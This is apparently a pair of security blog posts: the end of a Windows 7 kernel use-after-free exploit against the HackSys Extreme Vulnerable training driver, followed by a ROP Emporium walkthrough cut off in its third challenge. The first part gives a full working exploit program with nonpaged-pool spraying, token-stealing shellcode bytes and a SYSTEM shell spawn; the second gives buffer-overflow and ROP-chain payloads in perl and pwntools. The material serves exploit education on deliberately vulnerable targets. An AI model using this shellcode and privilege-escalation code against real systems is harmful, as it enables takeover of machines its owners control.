        DbgPrint("[+] Fake Object: 0x%p\n", KernelFakeObject);
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

The fake object is simply an object which is the same size as the UAF object (0x58, recall the struct definitions in UseAfterFree.h), which has a 0x58-sized buffer. This means that it should be possible to simply fill the first 4 bytes with an address, which will be eventually interpreted as a function pointer. The rest of the buffer is irrelevant, as it won’t be used.

Writing the Exploit

Communicating with the Driver

As mentioned before, it’s possible to communicate with the driver from userland by using the DeviceIoControl windows API function. We will have to send a different IOCTL for each action. Examples are as follows:

DWORD inBuffSize = 1024;
DWORD bytesRet = 0;
BYTE* inBuffer = (BYTE*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inBuffSize);
RtlFillMemory(inBuffer, inBuffSize, 'A');

// Allocate the UAF Object
BOOL status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT,
                                inBuffer, inBuffSize,
                                NULL, 0, &bytesRet, NULL);

// Free the UAF Object
status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT,
                                inBuffer, inBuffSize,
                                NULL, 0, &bytesRet, NULL);

// Allocate our malicious object here somehow!!!

// Use the UAF Object after Free
status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_USE_UAF_OBJECT,
                                inBuffer, inBuffSize,
                                NULL, 0, &bytesRet, NULL);

Spraying the Nonpaged Pool

Recall that we need to replace the function pointer at the memory address previously owned by the UAF object (before it was freed). It would be great to be able to directly fill the memory address, but that just isn’t possible. Instead, we need to prepare the layout of the nonpaged pool so it’s easy to predict how the UAF object will be allocated.

We can use a technique called spraying to create approximately 0x58-sized (since this size matches the size of the UAF object) buckets in the nonpaged pool. We fill the nonpaged pool with these objects, and then create holes which are around 0x58 in size by freeing some of the objects. When the UAF object is allocated, it should fill one of the gaps opened by the freed objects. When the UAF object is then freed, all of the gaps can then be filled with fake objects (containing a function pointer pointing to our malicious payload) increasing the chance that a fake object will have hopefully overwritten the memory pointed to by the UAF object pointer.

What objects should be used to create the properly sized buckets? Any object that is around 0x58 in size. IoReserveObject, allocated using the NtAllocateReserveObject function, is exactly 0x60 in size. This should work fine for spraying the nonpaged pool. (Note that to allocate the IoReserveObject, the object type ID 1 needs to be passed as the last parameter).

There’s one problem with trying to use the NtAllocateReserve function - there’s no windows API function to call it. Instead, we need to get the address of the function from ntdll.dll, which is a dll containing all NT windows kernel functions. We can do this by using the GetModuleHandle function to get ntdll.dll, and the GetProcAddress function to get the address of NtAllocateReserve from the dll.

However, we need to be able to cast the address returned by GetProcAddress to a function pointer representing the NtAllocateReserveObject. To do this, we must set up the following defintions:

// Declaration of unicode string for object attributes
typedef struct _LSA_UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR Buffer;
} UNICODE_STRING;

// Declaration of object attributes for usage in NtAllocateReserveObject
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

// Basically declares a function pointer to the NtAllocateReserveObject
typedef NTSTATUS(WINAPI *_NtAllocateReserveObject)(
	OUT PHANDLE hObject,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN DWORD ObjectType);

It’s then possible to retrieve the address using the following code:

// Need to get address of the NtAllocateReserveObject from ntdll.dll
_NtAllocateReserveObject NtAllocateReserveObject = 
    (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateReserveObject");

It’s now possible to use the function. We need to spray a certain number of objects to defragment the nonpaged pool, and then spray again to allocate many sequential objects. The following function spray_pool has two loops to allocate the degfragmentation objects and the sequential objects, and uses vectors from <vector> to track the handles of all allocated objects (so that it’s possible to free them later). The vectors are returned from the function as a pair, so that it’s possible for the rest of the code to then choose which objects to deallocate. The function is parameterised by the total number of objects used to spray the nonpaged pool.

std::pair<std::vector<HANDLE>, std::vector<HANDLE>> spray_pool(int objects_n){
    // Use a quarter of the spray to defragment the heap
    // Use the rest for sequential heap allocations
    int defrag_n = 0.25 * objects_n;
    int seq_n = objects_n - defrag_n;

    std::cout << "Number of defrag objects to allocate: " << defrag_n << "\n";
    std::cout << "Number of sequential objects to allocate: " << seq_n << "\n";

    // Vectors storing the handles to all allocated objects
    std::vector<HANDLE> defrag_handles;
    std::vector<HANDLE> seq_handles;

    // Need to get address of the NtAllocateReserveObject from ntdll.dll
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateReserveObject");

    if (!NtAllocateReserveObject){
        std::cout << "Could not get NtAllocateReserveObject\n";
        exit(1);
    }

    for (int i = 0; i < defrag_n; i++){
        HANDLE handle = 0;
        // Allocate object, use 1 since we want to allocate the IoCompletionReserve object
        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&handle, NULL, 1);
        // Push handle to vector
        defrag_handles.push_back(handle);
    }

    for (int i = 0; i < seq_n; i++){
        HANDLE handle = 0;
        // Allocate object, use 1 since we want to allocate the IoCompletionReserve object
        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&handle, NULL, 1);
        // Push handle to vector
        seq_handles.push_back(handle);
    }

    std::cout << "Allocated " << defrag_handles.size()  << " defrag objects\n";
    std::cout << "Allocated " << seq_handles.size()  << " sequential objects\n";

    return std::make_pair(defrag_handles, seq_handles);
}

Now it’s possible to call the spray_pool function, and then use the vector of handles to free every second handle in the sequential allocations.

// Spray the pool
std::cout << "Spraying the pool\n";
std::pair<std::vector<HANDLE>, std::vector<HANDLE>> handles = spray_pool(poolAllocs);

// Create holes in the pool
std::cout << "Creating " << handles.second.size() << " holes\n";
for (int i = 0; i < handles.second.size(); i++){
    if (i % 2){
        CloseHandle(handles.second[i]);
        handles.second[i] = NULL;
    }
}

Allocating the Payload

Now all we have to do is allocate memory to hold the malicious payload, and create a bunch of fake objects which point to it. We can allocate memory in windows using VirtualAlloc. Once some virtual address space has been allocated for the payload, we can prompt the driver to allocate as many malicious fake objects as required to fill all of the gaps that were created in the previous step.

char payload[] = (
                    "\x60"
                    "\x64\xA1\x24\x01\x00\x00"
                    "\x8B\x40\x50"
                    "\x89\xC1"
                    "\x8B\x98\xF8\x00\x00\x00"
                    "\xBA\x04\x00\x00\x00"
                    "\x8B\x80\xB8\x00\x00\x00"
                    "\x2D\xB8\x00\x00\x00"
                    "\x39\x90\xB4\x00\x00\x00"
                    "\x75\xED"
                    "\x8B\x90\xF8\x00\x00\x00"
                    "\x89\x91\xF8\x00\x00\x00"
                    "\x61"
                    "\xC3"
                    );

// Set up payload buffer
DWORD payloadSize = sizeof(payload);
LPVOID payloadAddr = VirtualAlloc(NULL, payloadSize,
                                    MEM_COMMIT | MEM_RESERVE,
                                    PAGE_EXECUTE_READWRITE);
memcpy(payloadAddr, payload, payloadSize);
LPVOID payloadAddrPtr = &payloadAddr;

std::cout << "Payload address is: " << payloadAddr << '\n';

// Must set up the structure of the fake object so that
// it matches the structure of the UAF Object
DWORD totalObjectSize = 0x58;
BYTE payloadBuffer[0x58] = {0};
// Set the first 4 bytes to be the address to the payload function
memcpy(payloadBuffer, payloadAddrPtr, 4);

// Fill gaps with Fake Objects
std::cout << "Allocating fake objects\n";
std::cout << "Allocating " << handles.second.size() / 2 << " fake objects\n";
for (int i = 0; i < handles.second.size() / 2; i++){
    status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT,
                                payloadBuffer, totalObjectSize, NULL, 
                                0, &bytesRet, NULL);
}

It’s important to note that all the payload does is steal a token. As mentioned before, see tekwizz123’s github for a fully commented version of the payload’s assembly. For the original assembly code, see hacksysteam’s payloads on github. Additionally for a full description of how the payload works, see hasherzade’s blogpost. In summary, the payload steals the access token of the system process. It does this by:

  1. Getting the Kernel Processor Control Region (KPCR) from the fs register (x32 bit windows), and using struct fields (which point to other structs, which then point to other structs which finally point to the EPROCESS struct) to get the EPROCESS structure for the running process
  2. Traversing the linked list which connects all running processes until reaching the EPROCESS of the system process
  3. Copying the access token stored in the system EPROCESS to our running process’ EPROCESS structure

Some extra code is required to spawn cmd prompt with system privileges. The following code uses CreateProcessA to execute C:\Windows\System32\cmd.exe. We need to pass a STARTUPINFOA struct as a required input parameter (which for the most part, we initialise all fields to zero using ZeroMemory before setting the struct’s size field cb) and a PROCESS_INFORMATION struct, which will receive information about the process once it has been created.

    std::cout << "Spawning shell\n";
	PROCESS_INFORMATION pi;
	ZeroMemory(&pi, sizeof(pi));
	STARTUPINFOA si;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0,
                    CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);

Some Notes on Compilation

If you’re cross-compiling for windows on linux like me, you can install mingw-w64 using a package manager and use i686-w64-mingw32-g++ to compile. If you have any problems regarding missing dlls when running the exe on a windows vm, try the flags -static-libgcc and -static-libstdc++.

Final Exploit

The final exploit is below. Overall, the steps for the exploit are:

  1. Get handle to driver to initialise communication
  2. Spray the nonpaged pool, and create conveniently sized gaps
  3. Allocate a UAF Object
  4. Free the UAF Object
  5. Allocate many fake objects which point to the malicious payload
  6. Use the UAF Object
  7. Spawn windows system shell
#include <iostream>
#include <windows.h>
#include <vector>

// IOCTL Definitions from HackSysExtremeVulnerableDriver.h
#define HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HACKSYS_EVD_IOCTL_USE_UAF_OBJECT                  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT                 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT            CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS)

// From Common.h
typedef void (*FunctionPointer)();

// USE_AFTER_FREE object from UseAfterFree.h
typedef struct _USE_AFTER_FREE {
        FunctionPointer Callback;
        CHAR Buffer[0x54];
    } USE_AFTER_FREE, *PUSE_AFTER_FREE;

// Type definitions for NtAllocateReserveObject

// Declaration of unicode string for object attributes
// https://docs.microsoft.com/en-us/windows/win32/api/lsalookup/ns-lsalookup-lsa_unicode_string
typedef struct _LSA_UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR Buffer;
} UNICODE_STRING;

// Declaration of object attributes for usage in NtAllocateReserveObject
// https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

// Basically declares a function pointer to the NtAllocateReserveObject
// https://wj32.org/wp/2010/07/18/the-nt-reserve-object/
typedef NTSTATUS(WINAPI *_NtAllocateReserveObject)(
	OUT PHANDLE hObject,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN DWORD ObjectType);

std::pair<std::vector<HANDLE>, std::vector<HANDLE>> spray_pool(int objects_n){
    // Use a quarter of the spray to defragment the heap
    // Use the rest for sequential heap allocations
    int defrag_n = 0.25 * objects_n;
    int seq_n = objects_n - defrag_n;

    std::cout << "Number of defrag objects to allocate: " << defrag_n << "\n";
    std::cout << "Number of sequential objects to allocate: " << seq_n << "\n";

    // Vectors storing the handles to all allocated objects
    std::vector<HANDLE> defrag_handles;
    std::vector<HANDLE> seq_handles;

    // Need to get address of the NtAllocateReserveObject from ntdll.dll
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateReserveObject");

    if (!NtAllocateReserveObject){
        std::cout << "Could not get NtAllocateReserveObject\n";
        exit(1);
    }

    for (int i = 0; i < defrag_n; i++){
        HANDLE handle = 0;
        // Allocate object, use 1 since we want to allocate the IoCompletionReserve object
        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&handle, NULL, 1);
        // Push handle to vector
        defrag_handles.push_back(handle);
    }

    for (int i = 0; i < seq_n; i++){
        HANDLE handle = 0;
        // Allocate object, use 1 since we want to allocate the IoCompletionReserve object
        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&handle, NULL, 1);
        // Push handle to vector
        seq_handles.push_back(handle);
    }

    std::cout << "Allocated " << defrag_handles.size()  << " defrag objects\n";
    std::cout << "Allocated " << seq_handles.size()  << " sequential objects\n";

    return std::make_pair(defrag_handles, seq_handles);
}

int main(int argc, char* argv[]){
    if (argc < 2){
        std::cout << "Usage: " << argv[0] << " <number-of-pool-allocations>\n";
        exit(1);
    }

    int poolAllocs = atoi(argv[1]);

    char devName[] = "\\\\.\\HackSysExtremeVulnerableDriver";
    DWORD inBuffSize = 1024;
    DWORD bytesRet = 0;
    BYTE* inBuffer = (BYTE*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inBuffSize);
    RtlFillMemory(inBuffer, inBuffSize, 'A');

    // Get a handle to the driver
    std::cout << "Getting handle to driver";
    HANDLE dev = CreateFile(devName, GENERIC_READ | GENERIC_WRITE, 
                                NULL, NULL, OPEN_EXISTING, NULL, NULL);

    // Handle failure
    if (dev == INVALID_HANDLE_VALUE){
        std::cerr << "Could not get device handle" << std::endl;
        return 1;
    }

    // Spray the pool
    std::cout << "Spraying the pool\n";
    std::pair<std::vector<HANDLE>, std::vector<HANDLE>> handles = spray_pool(poolAllocs);

    // Create holes in the pool
    std::cout << "Creating " << handles.second.size() << " holes\n";
    for (int i = 0; i < handles.second.size(); i++){
        if (i % 2){
            CloseHandle(handles.second[i]);
            handles.second[i] = NULL;
        }
    }

    std::cout << "Sending IOCTLs\n";

    // Allocate the UAF Object
    std::cout << "Allocating UAF Object\n";
    BOOL status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT,
                                    inBuffer, inBuffSize,
                                    NULL, 0, &bytesRet, NULL);

    // Free the UAF Object
    std::cout << "Freeing UAF Object\n";
    status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT,
                                    inBuffer, inBuffSize,
                                    NULL, 0, &bytesRet, NULL);
    
    // Shellcode snippet from @tekwizz123
    char payload[] = (
                        "\x60"
                        "\x64\xA1\x24\x01\x00\x00"
                        "\x8B\x40\x50"
                        "\x89\xC1"
                        "\x8B\x98\xF8\x00\x00\x00"
                        "\xBA\x04\x00\x00\x00"
                        "\x8B\x80\xB8\x00\x00\x00"
                        "\x2D\xB8\x00\x00\x00"
                        "\x39\x90\xB4\x00\x00\x00"
                        "\x75\xED"
                        "\x8B\x90\xF8\x00\x00\x00"
                        "\x89\x91\xF8\x00\x00\x00"
                        "\x61"
                        "\x31\xC0"
                        "\xC3"
                        );

    // Set up payload buffer
    DWORD payloadSize = sizeof(payload);
    LPVOID payloadAddr = VirtualAlloc(NULL, payloadSize,
                                        MEM_COMMIT | MEM_RESERVE,
                                        PAGE_EXECUTE_READWRITE);
    memcpy(payloadAddr, payload, payloadSize);
    LPVOID payloadAddrPtr = &payloadAddr;

    std::cout << "Payload adddress is: " << payloadAddr << '\n';

    // Must set up the structure of the fake object so that
    // it matches the structure of the UAF Object
    DWORD totalObjectSize = 0x58;
    BYTE payloadBuffer[0x58] = {0};
    // Set the first 4 bytes to be the address to the payload function
    memcpy(payloadBuffer, payloadAddrPtr, 4);

    // Fill gaps with Fake Objects
    std::cout << "Allocating fake objects\n";
    std::cout << "Allocating " << handles.second.size() / 2 << " fake objects\n";
    for (int i = 0; i < handles.second.size() / 2; i++){
        status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT,
                                    payloadBuffer, totalObjectSize, NULL, 
                                    0, &bytesRet, NULL);
    }

    // Use the UAF Object after Free
    std::cout << "Using UAF Object after free\n";
    status = DeviceIoControl(dev, HACKSYS_EVD_IOCTL_USE_UAF_OBJECT,
                                    inBuffer, inBuffSize,
                                    NULL, 0, &bytesRet, NULL);

    // Spawning shell code snippet from @tekwizz123
    std::cout << "Spawning shell\n";
	PROCESS_INFORMATION pi;
	ZeroMemory(&pi, sizeof(pi));
	STARTUPINFOA si;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);

    // Close device
    CloseHandle(dev);
    return 0;
}

hevd-uaf-on-win7

✇Decaff Hacking

Rop Emporium 64-bit Complete Guide - Part 1

By: Sophie Boyle

This is (going to eventually be) a complete write-up of all challenges presented by Rop Emporium, which is a resource for learning return oriented programming. Each writeup is for the x86_64 version of the challenge. I tested all binaries on 64-bit Ubuntu 18. Currently I have completed the write-ups for challenges 1-4, and I am planning on completing challenges 5-8 in the next few weeks!

Table of Contents

Challenge 1 - Ret2Win

ret2win is the first challenge, and is a simple introduction to return oriented programming. It’s very straightforward, but introduces the important foundation concept of exploiting a buffer overflow in order to return to an attacker-specified address.

Recon

Firstly, we can conduct some basic recon on the binary using checksec, which can be installed on debian-based linux via sudo apt install checksec, or with dnf on RPM systems. Checksec is a script which checks for various security mechanisms in the binary.

Recon with checksec

For the challenge, we can see that NX is enabled, which means that the stack is not executable. This is why we have to use return-oriented programming in the first place. We can’t simply put shellcode on the stack and run it. Instead, we need to find addresses in the binary pointing to useful instructions, and use a buffer overflow to overwrite the instruction pointer ($rip) to jump to them. checksec also tells us that PIE (position independent executable) is disabled, which means that symbols will always be loaded at the same address. This makes ropping much easier; as we can simply analyse the binary with gdb to see how the program is laid out in memory and craft our shellcode from that information. Also notice that checksec reports that symbols still exist in the binary, meaning that info such as readable function names can still be found in the compiled binary. We can move on to decompiling the binary with ghidra to get an idea of what the binary does.

Decompilation of main function

Decompilation of pwnme function

The decompilation of the pwnme function shows that there is a buffer overflow vulnerability as a result of its usage of the read() function. It will read 56 bytes of user input and place it in a buffer which only has 32 bytes allocated to it. This results in an overflow followed by a segmentation fault as shown below.

Program segfaults when given 56 bytes of user input

Debugging

We can use gdb to debug the program (gdb ./ret2win), disassemble the pwnme function (disassemble pwnme), leave a breakpoint (breakpoint *<addr>), and view the stack (x/40wx $sp) and registers (info frame) to understand why the segfault is occurring. We can leave a breakpoint specifically at the leave instruction, to see what the stack looks like at the end of the pwnme function. Use run to run the program until the breakpoint is hit (gdb will still prompt you to enter an input to the program though, so provide a string of “A”s, or any pattern that’s easily identifiable in hex).

Disassembly of pwnme function

View of stack at the end of the pwnme function

Info frame results at the end of the pwnme function

In the output from gdb, we can see that the instruction pointer $rip has been overwritten with A’s. The segfault is occurring because when the pwnme function returns, the execution attempts to jump to the address pointed to by $rip, \0x4141414141414141, which is unaccessible from the program. We can also see that $rip is located at address 0x7fffffffdee8 - this is the address we want to overflow, and therefore replace the contents of, in order to hijack execution. We can also see that the buffer where our user input is allocated can be found at 0x7fffffffdec0. We can compute the difference between these two addresses in gdb using p/d 0x7fffffffdee8 - 0x7fffffffdec0. This gives 40 bytes between the addresses, meaning 40 bytes of padding is required to overflow $rip. Now, we need to look for an address which will be advantageous to getting the flag. We can use ghidra to check the binary’s other exported functions, and find that there is a ret2win function.

Decompilation of ret2win function

In the decompilation of the ret2win function, we can see that this is the function which prints the flag using a system() call. We can try to jump straight to this system call in order to print the flag, by replacing the address pointed to by $rip with the address of the instruction which sets up the system call. We need to jump to the mov instruction prior to the system instruction itself, since the mov instruction will set up the arguments for the system call.

Disassembly of ret2win function

Exploit 1 - Generating the payload and jumping to the system call

The payload can be generated with the following perl script, and then provided as input to the ret2win program. The perl script prints 40 bytes of NO-OP, followed by the address of the instruction just prior to the syscall. This will fill the space between the beginning of the buffer and the $rip register on the stack, and replace the address pointed to by $rip with the address to the instruction in the ret2win function.

perl -e 'print "\x90"x40; print "\x64\x07\x40\x00\x00\x00\x00\x00";' > payload
./ret2win < payload

Flag achieved

Exploit 2 - Using pwntools to jump to ret2win

Note, if using ubuntu18 64-bit, then if you want to jump to the beginning of the ret2win function instead of immediately to the system call, you need to add a gadget to a ret instruction as per the guidance provided at the rop emporium website. This can be done using pwntools, a framework for developing exploits with a python API, as shown below.

from pwn import *

context.binary = './ret2win' # auto-set variables such as architecture
ret_gadget = next(context.binary.search(asm("ret")))
exploit = b'\x90'*40 + p64(ret_gadget, endian="little") + b'\x64\x07\x40\x00\x00\x00\x00\x00'

open('payload', 'wb').write(exploit)

Challenge 2 - split

The second challenge involves the same concept from the previous challenge, but this time requires some extra steps in order to provide the correct argument to the syscall.

Recon

For split, checksec will again state that the binary has been compiled with NX. The binary is also still PIE enabled, therefore we won’t need to bypass any ASLR. We can use ghidra to quickly read the decompilation of the functions found in the binary.

Main() decompilation

Pwnme() decompilation

UsefulFunction() decompilation

We can see that the main function calls the pwnme function, where a buffer overflow vulnerability exists as a result of reading 96 bytes of user input into an array with only 32 bytes allocated to it. usefulFunction() contains a call to system with the parameter /bin/ls, however, it is not called in the usual flow of execution. This means that we have to jump to it in order for the syscall to be executed. This can be done by replacing the value in the $rsp register with the address of the instruction before the syscall (the mov call which places the parameter into the $rdi register), as we did for ret2win.

We can run split in gdb, and disassemble the pwnme() function in order to set a breakpoint (break *0x400740), and check the stack (x/40wx $sp) and registers (info frame) just before the function returns.

Pwnme() disassembly

View of the stack at the end of the pwnme() function

We can again use gdb to check the space between the beginning of the buffer and $rsp via: p/d 0x7fffffffdef8 - 0x7fffffffded0, which equals 40 bytes, meaning that our payload requires 40 bytes of padding, followed by the address that we want to jump to, which will replace the value at $rsp. We can generate a payload which will jump to the mov ...; callq system; instructions (shown in the disassembly of usefulFunction() below) using the following perl one-liner.

UsefulFunction() disassembly

perl -e 'print "\x90"x40; print "\x46\x07\x40\x00\x00\x00\x00\x00";' > payload

Running split with the payload results in /bin/ls being run in the current directory.

Split run with jump to usefulFunction()

This is a good start, but we need some way of running /bin/cat flag.txt instead of /bin/ls. We can use radare2 in order to check all of the statically defined strings in the binary, and check if there exists a /bin/cat flag.txt anywhere. The command for viewing all strings in split is rabin2 -z split, the output of which shows that the string /bin/cat flag.txt exists in the .data section.

Rabin2 outputs the statically defined strings found in the binary

We can also confirm this in gdb by outputting the value at the address shown by rabin2:

Screenshot of "usefulString" /bin/cat flag.txt printed in gdb

We need to find a way to replace the parameter passed to the system call with the address of usefulString.

Finding ROP Gadgets

When a system call is made, it reads its first parameter from the $rdi register, which is why you always see a mov <addr>,%edi instruction prior to the system call itself. We need to find a way to control the argument loaded to the $rdi register and then jump straight to the system call if we want to run the system call with our own custom arguments. Now, we can finally look for some ROP gadgets! ROP gadgets are addresses in the binary which point to instructions which are useful to us as the attacker.

We can use radare2 again to look for ROP gadgets by first loading the binary into radare2 (radare2 split), and then using the /R command to look for ROP gadgets. Specifically, we want something that allows us to place the address of usefulString in the $rdi register. At first, I tried looking for an instruction which directly moved the address into the register: mov $0x601070,%rdi, but this didn’t exist in the binary at all (and would probably be too easy). Instead, since we can control the values on the stack as a result of the buffer overflow, we can make use of any instruction that takes a value directly from the stack, such as pop (which takes the value at the top of the stack and places it in the destination register). Looking for pop rdi using radare2 shows that there exists a pop rdi instruction at address 0x004007c3!

Radare2 outputting the address of the pop rdi gadget

Since the pop rdi instruction is directly followed by a ret (which will pop an address from the top of the stack and jump to it) we can jump to the system call in usefulFunction() at 0x40074b after executing pop rdi. This means that our payload needs to have the following structure:

payload = padding * 40 + pop_rdi_address + usefulString_address + syscall_address

Final Exploit

We can generate the payload with the following perl script:

perl -e 'print "\x90"x40;
print "\xc3\x07\x40\x00\x00\x00\x00\x00";
print "\x60\x10\x60\x00\x00\x00\x00\x00";
print "\x4b\x07\x40\x00\x00\x00\x00\x00";' > payload

The program will run normally until the end of pwnme(), where it “returns” to the address of the pop rdi instruction as a result of overwriting the value at $rbp. When it reaches the pop rdi instruction, the address of the usefulString (/bin/cat flag.txt) will be placed in the $rdi register. Afterwards, ret is executed, which pops the address of the system call in usefulFunction from the stack and jumps to it. The system call reads its parameter from the $rdi register, and runs /bin/cat flag.txt!

Running split with the payload shows that the flag is outputted

Challenge 3 - callme

The third challenge, callme, works differently from the first two challenges. The instructions state that the flag is encrypted, and that the functions callme_one, callme_two, and callme_three must be called with arguments 0xdeadbeef, 0xcafebabe, and 0xd00df00d on 32-bit, or 0xdeadbeefdeadbeef, 0xcafebabecafebabe, and 0xd00df00dd00df00d on 64-bit for the flag to be decrypted. The callme functions are provided by the shared library libcallme.so.

Recon

Checksec again reports that the binary has NX enabled, and PIE disabled. The screenshots below show the ghidra decompilation of the functions in the binary itself:

Main decompilation

Pwnme decompilation

UsefulFunction decompilation

The pwnme function has a buffer overflow vulnerability as a result of reading 512 bytes of user input into a 32-byte buffer. Also note that there is again a usefulFunction function, which calls each callme function in reverse order. The challenge instructions state that this function won’t be particularly useful to the challenge, however, and only exists so that the callme functions are linked.

PLT and GOT

The callme binary is dynamically linked, meaning that the addresses of the callme functions (exported by libcallme.so) are unknown at load-time. In order to reduce the size of the binary itself, all calls to library functions are made to the procedural linkage table (.plt) instead of a hardcoded address. Evidence of this can be seen in the disassembly of the usefulFunction, where the callme functions are called via [email protected], [email protected], and [email protected].

usefulFunction disassembly

When a function is called, the .plt table will redirect the call to the global offset table. The GOT will contain the true address of the function in memory. However upon the first call of a function, there will be no GOT entry for that function, and the dynamic linker must be called in order to find the address of the function in memory and patch the GOT entry for that function with the located address. More information about the PLT and GOT can be found at the ROP Emporium Appendix.

For this challenge, lazy binding means that it’s possible to jump to the PLT entries for each callme function in order for them to be called. As seen in the disassembly of usefulFunction, the addresses of the PLT entries are:

Finding ROP Gadgets

We need a ROP gadget that can place the arguments into the correct registers for each call, similar to the ROP gadget used in split. The calling convention on linux states that registers rdi, rsi, and rdx are used for arguments 1, 2, and 3 respectively. Therefore, we need one or multiple ROP gadgets capable of loading arguments into each of these registers. Again, radare2 can be used in order to find ROP gadgets.

ROP gadget which pops values from the stack and places them into the correct argument registers

Fortunately, there exists a single ROP gadget at 0x0040093c which will pop arguments from the stack and place them in rdi, rsi, and rdx, and return to the address on the stack.

Writing the Payload

Calling callmeone

Similarly to the previous two challenges, we can place a breakpoint at the end of the pwnme function to check how much padding is required in order to overwrite the value at $rsp. I haven’t included any screenshots for this, since the steps are very similar to the previous challenges:

  • Run callme with gdb: gdb callme
  • Place the breakpoint at the end of pwnme: break *<addr_of_leaveq
  • Run until the breakpoint: run
  • Use info frame to take note of the locations of $rsp and $rip
  • Calculate the space between both addresses in order to check how much padding is required: p/d <rip_addr> - <rsp addr>

This gives 40 bytes of space between $rsp and $rip. The payload structure to call callme_one becomes: padding x 40 + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected]. This can be generated with the following perl script:

perl -e 'print "\x90"x40;
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
print "\x20\x07\x40\x00\x00\x00\x00\x00"' > payload

It’s possible to set a breakpoint at the address of the ret at the end of the ROP gadget (0x0040093f) to check that the arguments are being placed in the registers correctly.

Arguments placed in the correct registers following execution of the ROP gadget

Calling callmetwo

Now that the first stage of the payload which calls callme_one has been built, we need to determine how to call callme_two. We can use step in gdb in order to step into callme_one and check the state of the registers.

Register information at callme_one

gdb shows that the value of the instruction pointer which the callme_one function will return to is located at 0x7fffffffdf10. Fortunately, the buffer overflow in pwnme reads 512 bytes of user input, meaning it should be possible to overflow the $rip in callme_one long before it’s even called! We can compute the distance between callme_one's $rip and pwnme's $rsp using gdb: p/d 0x7fffffffdf10 - 0x7fffffffdec0, which gives 80 bytes. Recall that the first stage of the payload (which called callme_one) consisted of:

  • 40 bytes of padding
  • 8 byte address of the ROP gadget
  • 3 x 8 bytes of arguments
  • 8 byte address of callme_one

This means that the first stage of the payload was 80 bytes long. As a result, the second stage of the payload which calls callme_two can be placed directly after the first stage without any padding. The structure becomes: padding x 40 + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected] + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected]. Again, the payload can be constructed using the following perl script:

perl -e 'print "\x90"x40;
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
print "\x20\x07\x40\x00\x00\x00\x00\x00";
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
